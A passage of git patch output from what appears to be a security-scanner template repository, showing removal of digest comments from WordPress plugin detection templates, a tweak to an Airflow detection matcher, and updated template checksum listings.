of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index fe9e5f1b26b..4a8bc6b75c7 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100df31fbe5717696c01866dc4917affce286609c907ba783b0ef2a2b96c745491102205cd240c73fcf7ef5a39f328f7f95bbc4eb92a19d2eead2cfa3eaeb888481a80a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 5e4c0f3ca6a..d2c74355bd7 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210096c85d6f9e277368ead68c2f0757d84091e2019197100eae001719cefd88cffb022100fac4ffbd52dbf02f155f717b4c78accf9b3b9fc0527e5a99282f13a767c89e7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index a4ee11efefc..94b8494b08d 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220650f8cea974d8b2e352a666a3e80626ddf8e452448a0790de672285f7e4d0b91022100c6eda07092e96a1ac6286299950c6a388a2d2cdd85cad87fcc3ff79a97fecbb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 0b2b7f0231a..108aba79e99 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100deb377984fd2b3ab9d27c28cb8a070d0ce275763fe901bb55b231a01fa3117c2022100a89391ba79403cb5d4083f2ef4d6618c038fdadedfdce568dc66f02b5ab77c41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 92442865d4a..f6f6bf55667 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f170af963b74277e46c3da5ba91fc83edcbf468c9498157c49e954f875662c720220618eab9f7680929c3b1ee51c1f8ad12517b64125c0436595dc728f34198c4f08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index a08b7676295..483cb7cac74 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203934cca505b09c9bddbf78af4089aec5d025137a4d0d456eb7eb11563b12d257022100cd98223af3138e6b0a1bb9c8a4ca03dfd34c0863e1953f17bc63f855f1e5668a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 2f2812e9642..a132c98df49 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100815241f8421040a127bbdb3259fce90cfd87c46eec6bc4763f27a7d3d6aa713e022100ea786efd10cfeb0d9ec1b7cfdb78f494046b58bbd9442415627899e23a103442:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 9120ceb7ecd..135bbee0467 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202ba536d064a4552f875d397b0708b9843805e7ef2daa313c6d835b05a69a747b0221008b01bd691c4f3d2e317c37e5c689814ca3b2f1868b75b1f3f28ef18378864bb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index be4ed155996..5b690d96c0d 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c9cdd9a9270855ee166f1596b4b40f27800a6a9f4174216f83710fa4128e1bba022025c69b96e7007a78b3b6430d664ea921d55facc916f5e68a4ecd99c7fc966846:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 841be88d9d3..16c7d6cff55 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201d4ee1325ba19b866f722bc054eb6bfc7924d5fea84a3bcd2d1bdbbfdc561eff0220469c3933f131fdfcbe09378ebcaceea0e4601b4bc57c108098ca346e44b0470d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index f1d5acc0d90..ab099f357e3 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022039093043ab26441048b6b08994a650132e636b5a6a786c78fd796e631ae219a302210098cb0089292fdbdb87fbf3d01b73e194df76c4ffb98bdfe6a730437b6177caa7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 5233960732e..ad0b8f8fed6 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220257fc3408cd037efa40f3965f70e07db7f4d2d80e7824a0905c6c69bc02f93a9022100813e17873e26f7b7100e2958036e149270d2722053cdcf229a8665522d91c35b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 820567bd848..aaaf0f9a172 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fdc176d18cfadc4ebdd03c96a2b2c896ba279b199c5fc5787ee65838289b5a8a02210081d9120859bb079fb9a5cde415bacf47eddc8a091b2a35efb5930726f2d29e87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index 6599e51b5bc..f943c7afebd 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100887d497d3671535f30d43ff739fdd40c15acaedd878b27ee997bafee13c79811022100a3177032c93553fd1e11825ec7a9194e1610e9b51f0d2c1d2ac6d720a59f2c47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index b0d3fd2d9aa..062e5c85b49 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100df72f793ea66e6994fa7b7c697bd5bde4b8d628eacb5e3a1f5490e418ce76bb30221008eeaf54a1ab709e9880f169789858d5cfb0133ba46fca489decc5b0b7aa3ddc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index db4ea9e87d9..6dcfdda1174 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203aa42be8215e7ba48b01d278798d1dda57df3238e6f3fafa54a4177dd5f06be2022039c61d93d8c9822f02d7a73fed1d57f3e8e0dd30ba57ab558bafcb4ca46a13a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 1e816618668de5c0506794c40ba1d366e61cdd0c Mon Sep 17 00:00:00 2001 From: Vikas Gupta Date: Wed, 17 Jul 2024 16:03:03 +0530 Subject: [PATCH 240/247] Update airflow-detect.yaml For newer versions --- http/technologies/apache/airflow-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/technologies/apache/airflow-detect.yaml b/http/technologies/apache/airflow-detect.yaml index eb64400cc01..b85792d59bf 100644 --- a/http/technologies/apache/airflow-detect.yaml +++ b/http/technologies/apache/airflow-detect.yaml @@ -20,7 +20,7 @@ http: - type: word part: body words: - - "Airflow 404 = lots of circles" + - "Airflow 404" - type: status status: From 78870d698bcc1caddf6c0505751249872b8738e4 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 17 Jul 2024 10:56:09 +0000 Subject: [PATCH 241/247] Auto Generated New Template Addition List [Wed Jul 17 10:56:09 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 660a17e54c0..599faf28879 100644 --- a/.new-additions +++ b/.new-additions @@ -16,6 +16,7 @@ http/exposed-panels/falcosidekick-panel.yaml http/exposed-panels/gradle/gradle-develocity-panel.yaml http/exposures/configs/apache-ozone-conf.yaml http/exposures/configs/snoop-servlet-exposure.yaml +http/exposures/files/adcs-certificate.yaml http/misconfiguration/servicenow-title-injection.yaml http/technologies/apache/apache-ozone-detect.yaml http/technologies/wordpress/plugins/wp-crontrol.yaml From 007eeae9090a8ef30c9d1b1f23f3ec57f704542d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 17 Jul 2024 10:56:24 +0000 Subject: [PATCH 242/247] Auto Generated Templates Checksum [Wed Jul 17 10:56:24 UTC 2024] :robot: --- templates-checksum.txt | 433 +++++++++++++++++++++-------------------- 1 file changed, 217 insertions(+), 216 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index d1ccdd58d0f..dbcc5cf3aef 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -734,7 +734,7 @@ helpers/wordlists/wp-passwords.txt:dd36d46539d71aa9d1ecbdc83c7b74b931986d56 helpers/wordlists/wp-users.txt:b07f7f79b1d6ed1832e37e1d3feea3fd2bfb764b helpers/wordpress/plugins/ad-inserter.txt:f877a4a8ab02364267e9ac08e5a43ed3eb6f221e helpers/wordpress/plugins/add-to-any.txt:08d2e98e6754af941484848930ccbaddfefe13d6 -helpers/wordpress/plugins/admin-menu-editor.txt:9f028fa080dca632a19e807c2a3570f67ae71de3 +helpers/wordpress/plugins/admin-menu-editor.txt:4cf4800c61a8883b820676f651c058621e0c1b88 helpers/wordpress/plugins/adminimize.txt:ec155403800c88db49630516a63f68500f17d612 helpers/wordpress/plugins/advanced-custom-fields.txt:a7fbd6d327737c06c4df75324d67f7a31797d931 helpers/wordpress/plugins/akismet.txt:dc89f60f46ccf047183c71c1efe28ba794cbc8f8 @@ -744,7 +744,7 @@ helpers/wordpress/plugins/all-in-one-wp-migration.txt:965640b9f3dffab46786b739a0 helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:e935235d3647d6ff94e208a06b4173d6d3f01134 helpers/wordpress/plugins/amp.txt:c78453b22ddacc88b67ece8b294a6b5930f15836 helpers/wordpress/plugins/antispam-bee.txt:ce256ecfbb665c5366c1669a3e7c3a24c65a6fa2 -helpers/wordpress/plugins/astra-sites.txt:3d21640165adc9cb26c17e43dc6358a33c744d03 +helpers/wordpress/plugins/astra-sites.txt:c2dd4309068e440533d1b8b76fb6680a1324df74 helpers/wordpress/plugins/astra-widgets.txt:b210421abec0f36f79921c4cf586c321fb96deda helpers/wordpress/plugins/autoptimize.txt:1889abba77b26fc1827431e5d46978a5e89769e6 helpers/wordpress/plugins/backwpup.txt:93cd63d42092dfdf799d4cecf593fe4d574f77dd @@ -774,7 +774,7 @@ helpers/wordpress/plugins/copy-delete-posts.txt:a2048abb201b6201e7cd25e8b0262758 helpers/wordpress/plugins/creame-whatsapp-me.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/creative-mail-by-constant-contact.txt:8a49e162e780f4c3a1d7e6f60cbfde4d5158004e helpers/wordpress/plugins/custom-css-js.txt:4ef690b935393e44a136931421e45fe50451b469 -helpers/wordpress/plugins/custom-fonts.txt:c7e3a41454e034e5ad994df8bf12b61e9fb1e1bc +helpers/wordpress/plugins/custom-fonts.txt:bcfa1e591aab992fff773d6a0dc4bb58433d278a helpers/wordpress/plugins/custom-post-type-ui.txt:4bfe61fd9e7ec461ff91963632ff470bd1264c1a helpers/wordpress/plugins/disable-comments.txt:2ae3ad2f93cb6bc93d15eedb93cdf5051262687b helpers/wordpress/plugins/disable-gutenberg.txt:7c49f6117c3f09ee90548ad70960b7a9b716deb8 @@ -790,7 +790,7 @@ helpers/wordpress/plugins/elementor.txt:d9abe4c43d66f95b79773f980a97bfd3f2148920 helpers/wordpress/plugins/elementskit-lite.txt:998d4ef3e7a6039ddbf0f888a2fd1c5243f7318b helpers/wordpress/plugins/enable-media-replace.txt:02c0165b5afcee9880bd9f9df6fd96ec80b231d4 helpers/wordpress/plugins/envato-elements.txt:56edf1b708bdabe845695022e07cf4185f4dcad7 -helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt:ccf30be4f6440a2ed97fd66ad803378be157d525 +helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt:778d773431944dd657af2fde3406d17be92f9cfe helpers/wordpress/plugins/ewww-image-optimizer.txt:870e5d450f9b724470527fe121b78fd6bbf6d9aa helpers/wordpress/plugins/facebook-for-woocommerce.txt:f94488dae421ac2a8aae98632f63a2647ef07e43 helpers/wordpress/plugins/fast-indexing-api.txt:9179d5509f8564f9a9b7411a76b338ec2a3b721c @@ -834,12 +834,12 @@ helpers/wordpress/plugins/leadin.txt:d4a4068d21627778d982b009ccde0601fc6647b8 helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:3996adb4a5baf85b23093a06a6e8607146c2380c helpers/wordpress/plugins/limit-login-attempts.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/litespeed-cache.txt:3a108f8e498bd0c9790af41f7f7d8093515044ff -helpers/wordpress/plugins/loco-translate.txt:0aa5278ef5ea1dbf030f22ea213474a6ac406d64 +helpers/wordpress/plugins/loco-translate.txt:b8693a006e8d4b4817ba2402c67eff9e73383a45 helpers/wordpress/plugins/loginizer.txt:83057b5c2ba4158be4c360919fba39e92c0cd3ca helpers/wordpress/plugins/loginpress.txt:4ea93c6a1e320054f99d66f428e611b31355cd92 helpers/wordpress/plugins/mailchimp-for-woocommerce.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/mailchimp-for-wp.txt:0ef6ca3504757e440dbb7f74dfc7956540130d09 -helpers/wordpress/plugins/mailpoet.txt:8ee7471e0c39a54428f13c32349d570cc514d8d2 +helpers/wordpress/plugins/mailpoet.txt:970defc3a5b51878c279d9b687b808ec0765df77 helpers/wordpress/plugins/maintenance.txt:2a43381575a9307e0a57dabb66f98b0c79dfa944 helpers/wordpress/plugins/mainwp-child.txt:218d96849acd4f3914538408fbb4a3dca66ff25c helpers/wordpress/plugins/malcare-security.txt:ba9db54a3e9b0df9d1362a546f3b3e62f1aa032c @@ -881,7 +881,7 @@ helpers/wordpress/plugins/seo-by-rank-math.txt:85bea03724452599fd9bc595e166c423d helpers/wordpress/plugins/sg-cachepress.txt:bdca50b5cb1feb03950b48f4419acb02a57783cb helpers/wordpress/plugins/sg-security.txt:3591720dc29efed55da59e353bbd1e1ad90dedf6 helpers/wordpress/plugins/shortcodes-ultimate.txt:f0e80e9d8b6e35e4d07b971ea614c40d8ec4efa3 -helpers/wordpress/plugins/shortpixel-image-optimiser.txt:850cfb66b1912fccfdb12a41362d2393042887e5 +helpers/wordpress/plugins/shortpixel-image-optimiser.txt:01ac9a64a711d9d1b7130e24a92eb95b0850c705 helpers/wordpress/plugins/simple-custom-post-order.txt:106ca8d85638866255a70e746e9653cec398864b helpers/wordpress/plugins/simple-history.txt:ee49c41e728b7af9b4fa9de669951863a79a98b1 helpers/wordpress/plugins/simple-page-ordering.txt:8f52888ff7e35fd5ca310231fa076be1206b49bd @@ -895,21 +895,21 @@ helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt:6c75863a2a166b helpers/wordpress/plugins/sucuri-scanner.txt:381bb12da04a82580bb6d698b8798743668826bd helpers/wordpress/plugins/svg-support.txt:89941265e418c7729912b574c9b29eff77c5b172 helpers/wordpress/plugins/table-of-contents-plus.txt:412a33ae14746612317b013dc23213cd79b5f3f3 -helpers/wordpress/plugins/tablepress.txt:c83b2e9f55420fa41efd48e4a45103566c9e4767 +helpers/wordpress/plugins/tablepress.txt:98a16af997b52cb888232ab5d79a527b0716561c helpers/wordpress/plugins/taxonomy-terms-order.txt:d176141136f1fe969aeca56eb98e3734f24199ae helpers/wordpress/plugins/templately.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/the-events-calendar.txt:f7d7dab88570c6cb518c4022c6b0be1c5b833457 helpers/wordpress/plugins/themeisle-companion.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/tinymce-advanced.txt:93ab266c89e9dcb536484607a605b05e657be940 helpers/wordpress/plugins/translatepress-multilingual.txt:036622d5a32b0e5099f20d8cff7515dc042253aa -helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt:a2386393a973e72dbd27804a8dc3f6ef5962f536 +helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt:480da60c093184bf0f5f182f5e48a8389a98ab75 helpers/wordpress/plugins/under-construction-page.txt:93c73a1987305f0a1f548b0025a3cb9e15bf420f helpers/wordpress/plugins/unyson.txt:08105b9ddd906ead00c6c2b76a45ffa54f0efc2d helpers/wordpress/plugins/updraftplus.txt:e091c0a7d31789d70b4711b992ca9a2e1e822cea helpers/wordpress/plugins/use-any-font.txt:76aa3af2b1beb37efc64c37b686676bbf23eb2bb helpers/wordpress/plugins/user-role-editor.txt:9404e7a541d10e6480bcec6f52d5fabcf1fd9c4b helpers/wordpress/plugins/velvet-blues-update-urls.txt:abe23e8d51de58b629ca74fce30438ee71509264 -helpers/wordpress/plugins/w3-total-cache.txt:c3c414dd549c09cb265d8cf95aef8445bf875384 +helpers/wordpress/plugins/w3-total-cache.txt:ce69193a5f086b7c0e6f20efbf6aee50c63e8244 helpers/wordpress/plugins/webp-converter-for-media.txt:404069cef132c1712e21fc32e891e96cf01bca92 helpers/wordpress/plugins/webp-express.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/widget-importer-exporter.txt:92dd42eb7b198ffac6578eae5bcfc969383d138c @@ -921,15 +921,15 @@ helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:373c54d47cc406011bd3964 helpers/wordpress/plugins/woocommerce-legacy-rest-api.txt:6288dca36116a23967560d315aa079e9c4f5da8c helpers/wordpress/plugins/woocommerce-payments.txt:60d712d9a12f5416daabb3565821281c3cba1d4c helpers/wordpress/plugins/woocommerce-paypal-payments.txt:036622d5a32b0e5099f20d8cff7515dc042253aa -helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:a16cd18f1019f04b207109b189b504edbde41ab2 -helpers/wordpress/plugins/woocommerce-services.txt:09d7c94b6b07df41fc11fe17f108ad704d3a058e +helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:ce69bc556a6db2eb8d56b75a008630d482b077ce +helpers/wordpress/plugins/woocommerce-services.txt:8e805063c85859847271163a1c51e5865e460aea helpers/wordpress/plugins/woocommerce.txt:4fb032eb953a74896b4877c6950fc07e329c2a70 helpers/wordpress/plugins/woosidebars.txt:a2048abb201b6201e7cd25e8b0262758a98d59da helpers/wordpress/plugins/wordfence.txt:40c453bafd4ebdb4a4b38416eb90fd03d3073fc3 helpers/wordpress/plugins/wordpress-importer.txt:d195b61caef74dab647d06101869c0863fff7a69 helpers/wordpress/plugins/wordpress-seo.txt:e897fca0b3c8ab2a2a6dfca6e49d92a8ba550aaa helpers/wordpress/plugins/worker.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf -helpers/wordpress/plugins/wp-crontrol.txt:eb8b2b4c9662703da43bc73b59b0508ccdd9de8e +helpers/wordpress/plugins/wp-crontrol.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/wp-fastest-cache.txt:2e3c1317d99e9b751581574ebe5b0f4a32eea831 helpers/wordpress/plugins/wp-file-manager.txt:8c4e6ce593239d9464a2d3eb48692924898625be helpers/wordpress/plugins/wp-google-maps.txt:a7271cc82e11f6991ba3e441b86276cbfd98f338 @@ -945,7 +945,7 @@ helpers/wordpress/plugins/wp-rollback.txt:9900ba1358421f36ec71073f65f6a41eed98f7 helpers/wordpress/plugins/wp-seopress.txt:14665694dff2d37ef9323cf70015fe0466bea9b2 helpers/wordpress/plugins/wp-sitemap-page.txt:b600bf3dacb5d620338f6412a343d3349ec570bf helpers/wordpress/plugins/wp-smushit.txt:c7f53e91bcbfae4c21042e9d0833d24ed2cfc08c -helpers/wordpress/plugins/wp-statistics.txt:eaf1c1bdfba4abe49a572dfe88b7618f7fedd9f4 +helpers/wordpress/plugins/wp-statistics.txt:982b37978de445a43803deafb09df7076adbabc4 helpers/wordpress/plugins/wp-super-cache.txt:9f028fa080dca632a19e807c2a3570f67ae71de3 helpers/wordpress/plugins/wp-user-avatar.txt:a7bfba4c08f393aabc53a4392dbd6b3d0f13baaa helpers/wordpress/plugins/wpcf7-recaptcha.txt:c3000a6db3b2781a189fbfaa91a73e6d63d567c9 @@ -3479,7 +3479,7 @@ http/cves/2024/CVE-2024-34470.yaml:9e15fe4d83b7f511f9e363252311ce0fca2208d8 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 http/cves/2024/CVE-2024-34982.yaml:68453463b4c080e16f4b23e4bcf22565276f0e20 http/cves/2024/CVE-2024-3552.yaml:0994d94f6f8b7ea5f3774e6b4fbc542a57369f6e -http/cves/2024/CVE-2024-36401.yaml:772f40c37a1b1da253f91f61412f6d74b85d2a70 +http/cves/2024/CVE-2024-36401.yaml:2439f9a75658efa3cb4cc61de851bce44ed55dec http/cves/2024/CVE-2024-36412.yaml:3dab338da4cd060aacc90a2c21159bf56c95bdff http/cves/2024/CVE-2024-36527.yaml:eb2651a0ee32128fdfe8ae24c72f5d61a1a7f68e http/cves/2024/CVE-2024-36837.yaml:65450880230a57a47c4dbf8b268af022ab009189 @@ -5002,6 +5002,7 @@ http/exposures/configs/wpconfig-aws-keys.yaml:960a11b79d35bc5a3b164fc7e426fb02b5 http/exposures/configs/xprober-service.yaml:3480056d644ec37a3b9ce5e81f55b9b279d66880 http/exposures/configs/yii-debugger.yaml:d7c68b7d7e09cdd6933e07f4b0274cde60eb3671 http/exposures/configs/zend-config-file.yaml:f835fc3f4e814315144214f5bb0fe1a8cd178a71 +http/exposures/files/adcs-certificate.yaml:4eaec669c8a4fa91714bcf254c682581a83408df http/exposures/files/angular-json.yaml:33a8441b1e158d34f7f877820ba705662f9ba017 http/exposures/files/apache-licenserc.yaml:2a3d72cad226944f1ecf05789504cc811b77e5bc http/exposures/files/apdisk-disclosure.yaml:2c1e02f1fe0bf0c57cc1baf6d1fa6712b32a1856 @@ -7293,229 +7294,229 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:78e473b2002903a0192fd998b91f26e855b03d5e -http/technologies/wordpress/plugins/add-to-any.yaml:9829716605e935b6985f72c38c410dded0e990bc -http/technologies/wordpress/plugins/admin-menu-editor.yaml:33096ed0f498d97bdcad8672086d15d1fdf5aeff +http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 +http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:771b39420e143f066b590d47b05bdd6dcbe9c8a9 -http/technologies/wordpress/plugins/akismet.yaml:3134245df155fa9481f374871f595185bd758264 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d +http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0378656a08955e3633abb435d4e4f9cfc2237ae0 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:02be73602f59e4f4fa8dbed7bebbb05d32b0e094 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:458de0829203e3d0e9e4e39fbab567ae495937b2 -http/technologies/wordpress/plugins/amp.yaml:886625969dd2214d6e6a417c1f5e13a739140509 -http/technologies/wordpress/plugins/antispam-bee.yaml:e29d66f89996e3df7ffdf3d4811a7ea7dcd2aeb3 -http/technologies/wordpress/plugins/astra-sites.yaml:7a0612a7053fd0a6366d2c8159c76b9dc3530963 +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 +http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 +http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c +http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:54e76f9353ed04e61edc88260c07d795799cb753 -http/technologies/wordpress/plugins/backwpup.yaml:0368fdc564f22bd200a1b3eaa429da460de885c3 -http/technologies/wordpress/plugins/better-search-replace.yaml:d4d8f3048d5dd89667e74b691025044ee1a92445 -http/technologies/wordpress/plugins/better-wp-security.yaml:e2359d1e8adca00efb5f7cec7030e3ef29f71939 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:a2ce81ec51c39edc8c6c4c98b36bed27cb660140 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:ee8c422d49eaba49cc3663b01112954828814582 -http/technologies/wordpress/plugins/breeze.yaml:d9df29e7c06d2f76fe4f3dadf2267d1dafe795cb -http/technologies/wordpress/plugins/broken-link-checker.yaml:fe20e82f147bef77dde5e0d9da362b22729c54c2 